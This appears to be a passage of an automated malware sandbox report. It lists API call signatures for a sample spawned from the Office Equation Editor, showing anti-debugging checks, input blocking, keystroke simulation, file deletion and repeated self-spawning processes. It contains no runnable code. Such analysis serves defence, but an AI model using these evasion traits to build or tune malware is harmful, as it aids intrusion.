              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0086F0F2
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0086F3F3
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_008637EF
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00863B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00863B12
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0086BCBC
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013C445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_013C445A
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_013CC75C
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013CC6D1 FindFirstFileW,FindClose,6_2_013CC6D1
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_013CEF95
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_013CF0F2
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_013CF3F3
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_013C37EF
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_013C3B12
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_013CBCBC
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_008049A0
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-1219
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeAPI call chain: ExitProcess graph end nodegraph_5-104228
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeAPI call chain: ExitProcess graph end nodegraph_5-104264
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeAPI call chain: ExitProcess graph end nodegraph_5-104467
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00873F09 BlockInput,5_2_00873F09
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00803B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00803B3A
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00835A7C RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,5_2_00835A7C
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0094DA30 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,5_2_0094DA30
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C04E6 mov edx, dword ptr fs:[00000030h]2_2_035C04E6
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00A40608 mov eax, dword ptr fs:[00000030h]5_2_00A40608
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00A40668 mov eax, dword ptr fs:[00000030h]5_2_00A40668
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00A3EF88 mov eax, dword ptr fs:[00000030h]5_2_00A3EF88
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00A3EF76 mov eax, dword ptr fs:[00000030h]5_2_00A3EF76
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_008AE386 mov eax, dword ptr fs:[00000030h]6_2_008AE386
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_008AE398 mov eax, dword ptr fs:[00000030h]6_2_008AE398
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_008AFA18 mov eax, dword ptr fs:[00000030h]6_2_008AFA18
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_008AFA78 mov eax, dword ptr fs:[00000030h]6_2_008AFA78
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 7_2_00CDF9C0 mov eax, dword ptr fs:[00000030h]7_2_00CDF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 7_2_00CDE340 mov eax, dword ptr fs:[00000030h]7_2_00CDE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 7_2_00CDE32E mov eax, dword ptr fs:[00000030h]7_2_00CDE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 7_2_00CDFA20 mov eax, dword ptr fs:[00000030h]7_2_00CDFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 8_2_007DF9C0 mov eax, dword ptr fs:[00000030h]8_2_007DF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 8_2_007DE340 mov eax, dword ptr fs:[00000030h]8_2_007DE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 8_2_007DE32E mov eax, dword ptr fs:[00000030h]8_2_007DE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 8_2_007DFA20 mov eax, dword ptr fs:[00000030h]8_2_007DFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 9_2_0087FA20 mov eax, dword ptr fs:[00000030h]9_2_0087FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 9_2_0087E32E mov eax, dword ptr fs:[00000030h]9_2_0087E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 9_2_0087F9C0 mov eax, dword ptr fs:[00000030h]9_2_0087F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 9_2_0087E340 mov eax, dword ptr fs:[00000030h]9_2_0087E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 10_2_007DF9C0 mov eax, dword ptr fs:[00000030h]10_2_007DF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 10_2_007DE340 mov eax, dword ptr fs:[00000030h]10_2_007DE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 10_2_007DE32E mov eax, dword ptr fs:[00000030h]10_2_007DE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 10_2_007DFA20 mov eax, dword ptr fs:[00000030h]10_2_007DFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 11_2_009CE32E mov eax, dword ptr fs:[00000030h]11_2_009CE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 11_2_009CFA20 mov eax, dword ptr fs:[00000030h]11_2_009CFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 11_2_009CF9C0 mov eax, dword ptr fs:[00000030h]11_2_009CF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 11_2_009CE340 mov eax, dword ptr fs:[00000030h]11_2_009CE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 12_2_0083FA20 mov eax, dword ptr fs:[00000030h]12_2_0083FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 12_2_0083E32E mov eax, dword ptr fs:[00000030h]12_2_0083E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 12_2_0083F9C0 mov eax, dword ptr fs:[00000030h]12_2_0083F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 12_2_0083E340 mov eax, dword ptr fs:[00000030h]12_2_0083E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 13_2_0071F9C0 mov eax, dword ptr fs:[00000030h]13_2_0071F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 13_2_0071E340 mov eax, dword ptr fs:[00000030h]13_2_0071E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 13_2_0071FA20 mov eax, dword ptr fs:[00000030h]13_2_0071FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 13_2_0071E32E mov eax, dword ptr fs:[00000030h]13_2_0071E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 14_2_0089E32E mov eax, dword ptr fs:[00000030h]14_2_0089E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 14_2_0089FA20 mov eax, dword ptr fs:[00000030h]14_2_0089FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 14_2_0089F9C0 mov eax, dword ptr fs:[00000030h]14_2_0089F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 14_2_0089E340 mov eax, dword ptr fs:[00000030h]14_2_0089E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 15_2_0092FA20 mov eax, dword ptr fs:[00000030h]15_2_0092FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 15_2_0092E32E mov eax, dword ptr fs:[00000030h]15_2_0092E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 15_2_0092F9C0 mov eax, dword ptr fs:[00000030h]15_2_0092F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 15_2_0092E340 mov eax, dword ptr fs:[00000030h]15_2_0092E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 16_2_0095FA20 mov eax, dword ptr fs:[00000030h]16_2_0095FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 16_2_0095E32E mov eax, dword ptr fs:[00000030h]16_2_0095E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 16_2_0095F9C0 mov eax, dword ptr fs:[00000030h]16_2_0095F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 16_2_0095E340 mov eax, dword ptr fs:[00000030h]16_2_0095E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 18_2_00CAF9C0 mov eax, dword ptr fs:[00000030h]18_2_00CAF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 18_2_00CAE340 mov eax, dword ptr fs:[00000030h]18_2_00CAE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 18_2_00CAE32E mov eax, dword ptr fs:[00000030h]18_2_00CAE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 18_2_00CAFA20 mov eax, dword ptr fs:[00000030h]18_2_00CAFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 19_2_0079FD50 mov eax, dword ptr fs:[00000030h]19_2_0079FD50
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 19_2_0079E6D0 mov eax, dword ptr fs:[00000030h]19_2_0079E6D0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 19_2_0079E6BE mov eax, dword ptr fs:[00000030h]19_2_0079E6BE
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 19_2_0079FDB0 mov eax, dword ptr fs:[00000030h]19_2_0079FDB0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 20_2_008BF6D8 mov eax, dword ptr fs:[00000030h]20_2_008BF6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 20_2_008BDFE6 mov eax, dword ptr fs:[00000030h]20_2_008BDFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 20_2_008BF678 mov eax, dword ptr fs:[00000030h]20_2_008BF678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 20_2_008BDFF8 mov eax, dword ptr fs:[00000030h]20_2_008BDFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 21_2_008FE32E mov eax, dword ptr fs:[00000030h]21_2_008FE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 21_2_008FFA20 mov eax, dword ptr fs:[00000030h]21_2_008FFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 21_2_008FF9C0 mov eax, dword ptr fs:[00000030h]21_2_008FF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 21_2_008FE340 mov eax, dword ptr fs:[00000030h]21_2_008FE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 22_2_0093FA20 mov eax, dword ptr fs:[00000030h]22_2_0093FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 22_2_0093E32E mov eax, dword ptr fs:[00000030h]22_2_0093E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 22_2_0093F9C0 mov eax, dword ptr fs:[00000030h]22_2_0093F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 22_2_0093E340 mov eax, dword ptr fs:[00000030h]22_2_0093E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 23_2_0091F6D8 mov eax, dword ptr fs:[00000030h]23_2_0091F6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 23_2_0091F678 mov eax, dword ptr fs:[00000030h]23_2_0091F678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 23_2_0091DFF8 mov eax, dword ptr fs:[00000030h]23_2_0091DFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 23_2_0091DFE6 mov eax, dword ptr fs:[00000030h]23_2_0091DFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 24_2_0076F9C0 mov eax, dword ptr fs:[00000030h]24_2_0076F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 24_2_0076E340 mov eax, dword ptr fs:[00000030h]24_2_0076E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 24_2_0076FA20 mov eax, dword ptr fs:[00000030h]24_2_0076FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 24_2_0076E32E mov eax, dword ptr fs:[00000030h]24_2_0076E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 25_2_0086F6D8 mov eax, dword ptr fs:[00000030h]25_2_0086F6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 25_2_0086DFE6 mov eax, dword ptr fs:[00000030h]25_2_0086DFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 25_2_0086F678 mov eax, dword ptr fs:[00000030h]25_2_0086F678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 25_2_0086DFF8 mov eax, dword ptr fs:[00000030h]25_2_0086DFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 26_2_0088E32E mov eax, dword ptr fs:[00000030h]26_2_0088E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 26_2_0088FA20 mov eax, dword ptr fs:[00000030h]26_2_0088FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 26_2_0088F9C0 mov eax, dword ptr fs:[00000030h]26_2_0088F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 26_2_0088E340 mov eax, dword ptr fs:[00000030h]26_2_0088E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 27_2_00AEDFE6 mov eax, dword ptr fs:[00000030h]27_2_00AEDFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 27_2_00AEF678 mov eax, dword ptr fs:[00000030h]27_2_00AEF678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 27_2_00AEDFF8 mov eax, dword ptr fs:[00000030h]27_2_00AEDFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 27_2_00AEF6D8 mov eax, dword ptr fs:[00000030h]27_2_00AEF6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 28_2_0068F9C0 mov eax, dword ptr fs:[00000030h]28_2_0068F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 28_2_0068E340 mov eax, dword ptr fs:[00000030h]28_2_0068E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 28_2_0068E32E mov eax, dword ptr fs:[00000030h]28_2_0068E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 28_2_0068FA20 mov eax, dword ptr fs:[00000030h]28_2_0068FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 29_2_00A7DFE6 mov eax, dword ptr fs:[00000030h]29_2_00A7DFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 29_2_00A7F678 mov eax, dword ptr fs:[00000030h]29_2_00A7F678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 29_2_00A7DFF8 mov eax, dword ptr fs:[00000030h]29_2_00A7DFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 29_2_00A7F6D8 mov eax, dword ptr fs:[00000030h]29_2_00A7F6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 30_2_0096FA20 mov eax, dword ptr fs:[00000030h]30_2_0096FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 30_2_0096E32E mov eax, dword ptr fs:[00000030h]30_2_0096E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 30_2_0096F9C0 mov eax, dword ptr fs:[00000030h]30_2_0096F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 30_2_0096E340 mov eax, dword ptr fs:[00000030h]30_2_0096E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 31_2_0076F678 mov eax, dword ptr fs:[00000030h]31_2_0076F678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 31_2_0076DFF8 mov eax, dword ptr fs:[00000030h]31_2_0076DFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 31_2_0076DFE6 mov eax, dword ptr fs:[00000030h]31_2_0076DFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 31_2_0076F6D8 mov eax, dword ptr fs:[00000030h]31_2_0076F6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 32_2_006BDFE6 mov eax, dword ptr fs:[00000030h]32_2_006BDFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 32_2_006BF678 mov eax, dword ptr fs:[00000030h]32_2_006BF678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 32_2_006BDFF8 mov eax, dword ptr fs:[00000030h]32_2_006BDFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 32_2_006BF6D8 mov eax, dword ptr fs:[00000030h]32_2_006BF6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 33_2_00BBE32E mov eax, dword ptr fs:[00000030h]33_2_00BBE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 33_2_00BBFA20 mov eax, dword ptr fs:[00000030h]33_2_00BBFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 33_2_00BBF9C0 mov eax, dword ptr fs:[00000030h]33_2_00BBF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 33_2_00BBE340 mov eax, dword ptr fs:[00000030h]33_2_00BBE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 34_2_006CDFE6 mov eax, dword ptr fs:[00000030h]34_2_006CDFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 34_2_006CF678 mov eax, dword ptr fs:[00000030h]34_2_006CF678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 34_2_006CDFF8 mov eax, dword ptr fs:[00000030h]34_2_006CDFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 34_2_006CF6D8 mov eax, dword ptr fs:[00000030h]34_2_006CF6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 35_2_00AEE32E mov eax, dword ptr fs:[00000030h]35_2_00AEE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 35_2_00AEFA20 mov eax, dword ptr fs:[00000030h]35_2_00AEFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 35_2_00AEF9C0 mov eax, dword ptr fs:[00000030h]35_2_00AEF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 35_2_00AEE340 mov eax, dword ptr fs:[00000030h]35_2_00AEE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 36_2_0096FA20 mov eax, dword ptr fs:[00000030h]36_2_0096FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 36_2_0096E32E mov eax, dword ptr fs:[00000030h]36_2_0096E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 36_2_0096F9C0 mov eax, dword ptr fs:[00000030h]36_2_0096F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 36_2_0096E340 mov eax, dword ptr fs:[00000030h]36_2_0096E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 37_2_007BF678 mov eax, dword ptr fs:[00000030h]37_2_007BF678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 37_2_007BDFF8 mov eax, dword ptr fs:[00000030h]37_2_007BDFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 37_2_007BDFE6 mov eax, dword ptr fs:[00000030h]37_2_007BDFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 37_2_007BF6D8 mov eax, dword ptr fs:[00000030h]37_2_007BF6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 38_2_0082FA20 mov eax, dword ptr fs:[00000030h]38_2_0082FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 38_2_0082E32E mov eax, dword ptr fs:[00000030h]38_2_0082E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 38_2_0082F9C0 mov eax, dword ptr fs:[00000030h]38_2_0082F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 38_2_0082E340 mov eax, dword ptr fs:[00000030h]38_2_0082E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 39_2_0079F678 mov eax, dword ptr fs:[00000030h]39_2_0079F678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 39_2_0079DFF8 mov eax, dword ptr fs:[00000030h]39_2_0079DFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 39_2_0079DFE6 mov eax, dword ptr fs:[00000030h]39_2_0079DFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 39_2_0079F6D8 mov eax, dword ptr fs:[00000030h]39_2_0079F6D8
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008580A9 GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,5_2_008580A9
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0082A124 SetUnhandledExceptionFilter,5_2_0082A124
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0082A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0082A155
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_0138A124 SetUnhandledExceptionFilter,6_2_0138A124
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_0138A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0138A155
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008587B1 LogonUserW,5_2_008587B1
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00803B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00803B3A
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_008048D7
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00864C27 mouse_event,5_2_00864C27
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\kudo.exe "C:\Users\user\AppData\Local\Temp\kudo.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\Temp\kudo.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
